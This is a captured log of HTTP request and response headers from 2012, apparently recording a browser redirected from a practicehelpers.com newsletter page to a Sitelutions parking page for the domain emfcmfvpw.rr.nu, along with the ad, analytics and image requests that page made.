User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/include_files/css/sitelutions1.css
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Thu, 08 Nov 2012 03:15:06 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:17 GMT
Accept-Ranges: bytes
Content-Length: 44
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /pagead/js/r20121031/r20120730/show_ads_impl.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?emfcmfvpw.rr.nu
 
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8

P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 14655871875321016899
Date: Wed, 07 Nov 2012 20:35:01 GMT
Expires: Wed, 21 Nov 2012 20:35:01 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 19222
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=1209600
Age: 24005
GET /image_files/sl_logo.png HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/include_files/css/sitelutions1.css
 
HTTP/1.1 200 OK

Content-Type: image/png

Date: Thu, 08 Nov 2012 03:15:06 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:22 GMT
Accept-Ranges: bytes
Content-Length: 8913
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /image_files/bg-blurbs-is.jpg HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/include_files/css/sitelutions1.css
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Thu, 08 Nov 2012 03:15:06 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:17 GMT
Accept-Ranges: bytes
Content-Length: 12143
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /ga.js HTTP/1.1

Host: www.google-analytics.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?emfcmfvpw.rr.nu
If-Modified-Since: Wed, 19 Sep 2012 11:51:40 GMT
 
HTTP/1.1 200 OK

Content-Type: text/javascript

Content-Length: 14888
Content-Encoding: gzip
Last-Modified: Mon, 22 Oct 2012 15:51:19 GMT
X-Content-Type-Options: nosniff, nosniff
Date: Wed, 07 Nov 2012 20:42:20 GMT
Expires: Thu, 08 Nov 2012 08:42:20 GMT
Vary: Accept-Encoding
Cache-Control: max-age=43200, public
Age: 23566
Server: GFE/2.0
GET /image_files/badge_uptime.gif HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?emfcmfvpw.rr.nu
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Thu, 08 Nov 2012 03:15:06 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:16 GMT
Accept-Ranges: bytes
Content-Length: 1628
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /image_files/logo_bbbonline.gif HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?emfcmfvpw.rr.nu
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Thu, 08 Nov 2012 03:15:06 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:22 GMT
Accept-Ranges: bytes
Content-Length: 2994
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /image_files/badge_riskfree.gif HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?emfcmfvpw.rr.nu
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Thu, 08 Nov 2012 03:15:06 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:16 GMT
Accept-Ranges: bytes
Content-Length: 2459
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /pagead/osd.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?emfcmfvpw.rr.nu
If-None-Match: 13350759849962699205
 
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8

P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 6549576333968007708
Date: Thu, 08 Nov 2012 02:35:06 GMT
Expires: Thu, 08 Nov 2012 03:35:06 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 5986
X-XSS-Protection: 1; mode=block
Age: 2400
Cache-Control: public, max-age=3600
GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=1613457572&utmhn=domainpark.sitelutions.com&utmcs=UTF-8&utmsr=1176x885&utmvp=10x10&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=Redirection%20Not%20Found%20emfcmfvpw.rr.nu&utmhid=456231041&utmr=http%3A%2F%2Fwww.practicehelpers.com%2Fnewsletter%2Fpicerno%2Ffebruary%2F2010%2F&utmp=%2Fredir_not_found%2Fredir_not_found.shtml%3Femfcmfvpw.rr.nu&utmac=UA-9495639-6&utmcc=__utma%3D90851141.706341010.1352344507.1352344507.1352344507.1%3B%2B__utmz%3D90851141.1352344507.1.1.utmcsr%3Dpracticehelpers.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Fnewsletter%2Fpicerno%2Ffebruary%2F2010%2F%3B&utmu=DB~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=1&amp;utmn=1613457572&amp;utmhn=domainpark.sitelutions.com&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=10x10&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=Redirection%20Not%20Found%20emfcmfvpw.rr.nu&amp;utmhid=456231041&amp;utmr=http%3A%2F%2Fwww.practicehelpers.com%2Fnewsletter%2Fpicerno%2Ffebruary%2F2010%2F&amp;utmp=%2Fredir_not_found%2Fredir_not_found.shtml%3Femfcmfvpw.rr.nu&amp;utmac=UA-9495639-6&amp;utmcc=__utma%3D90851141.706341010.1352344507.1352344507.1352344507.1%3B%2B__utmz%3D90851141.1352344507.1.1.utmcsr%3Dpracticehelpers.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Fnewsletter%2Fpicerno%2Ffebruary%2F2010%2F%3B&amp;utmu=DB~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?emfcmfvpw.rr.nu
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Wed, 07 Nov 2012 20:42:20 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 23566
Server: GFE/2.0
GET /pagead/ads?client=ca-pub-2844624690808284&format=728x90_as&output=html&h=90&w=728&ad_type=text_image&ea=0&color_bg=FFFFFF&color_border=FFFFFF&color_link=0000FF&color_text=000000&color_url=008000&flash=10.0.45&url=http%3A%2F%2Fwww.practicehelpers.com%2Fnewsletter%2Fpicerno%2Ffebruary%2F2010%2F&dt=1352344506277&bpp=11&shv=r20121031&jsv=r20110914&correlator=1352344506546&frm=24&adk=2793510391&ga_vid=1073699447.1352344507&ga_sid=1352344507&ga_hid=456231041&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=arial&dfs=11&adx=-12245933&ady=-12245933&biw=-12245933&bih=-12245933&isw=10&ish=10&ifk=1748394117&oid=3&fu=0&ifi=1&dtd=279 HTTP/1.1

Host: googleads.g.doubleclick.net
GET /pagead/ads?client=ca-pub-2844624690808284&amp;format=728x90_as&amp;output=html&amp;h=90&amp;w=728&amp;ad_type=text_image&amp;ea=0&amp;color_bg=FFFFFF&amp;color_border=FFFFFF&amp;color_link=0000FF&amp;color_text=000000&amp;color_url=008000&amp;flash=10.0.45&amp;url=http%3A%2F%2Fwww.practicehelpers.com%2Fnewsletter%2Fpicerno%2Ffebruary%2F2010%2F&amp;dt=1352344506277&amp;bpp=11&amp;shv=r20121031&amp;jsv=r20110914&amp;correlator=1352344506546&amp;frm=24&amp;adk=2793510391&amp;ga_vid=1073699447.1352344507&amp;ga_sid=1352344507&amp;ga_hid=456231041&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=arial&amp;dfs=11&amp;adx=-12245933&amp;ady=-12245933&amp;biw=-12245933&amp;bih=-12245933&amp;isw=10&amp;ish=10&amp;ifk=1748394117&amp;oid=3&amp;fu=0&amp;ifi=1&amp;dtd=279 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?emfcmfvpw.rr.nu
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
 
HTTP/1.1 403 Forbidden

Content-Type: text/html; charset=UTF-8

P3P: policyref=&quot;http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml&quot;, CP=&quot;CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR&quot;
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Thu, 08 Nov 2012 03:15:06 GMT
Server: cafe
Cache-Control: private
Content-Length: 82
X-XSS-Protection: 1; mode=block
GET /image_files/bg-blurbs-bm.jpg HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/include_files/css/sitelutions1.css
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Thu, 08 Nov 2012 03:15:06 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:16 GMT
Accept-Ranges: bytes
Content-Length: 13308
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /image_files/bg-blurbs-cb.jpg HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/include_files/css/sitelutions1.css
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Thu, 08 Nov 2012 03:15:06 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:16 GMT
Accept-Ranges: bytes
Content-Length: 10253
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /image_files/bg-blurbs-dm.jpg HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/include_files/css/sitelutions1.css
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Thu, 08 Nov 2012 03:15:06 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:17 GMT
Accept-Ranges: bytes
Content-Length: 10926
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /favicon.ico HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 404 Not Found

Content-Type: text/html

Date: Thu, 08 Nov 2012 03:15:07 GMT
Server: Apache
Content-Length: 640
Keep-Alive: timeout=2, max=198
Connection: Keep-Alive
GET /favicon.ico HTTP/1.1

Host: www.practicehelpers.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 404 Not Found

Content-Type: text/html

Date: Thu, 08 Nov 2012 03:15:08 GMT
Server: Apache
Content-Length: 640
Keep-Alive: timeout=2, max=197
Connection: Keep-Alive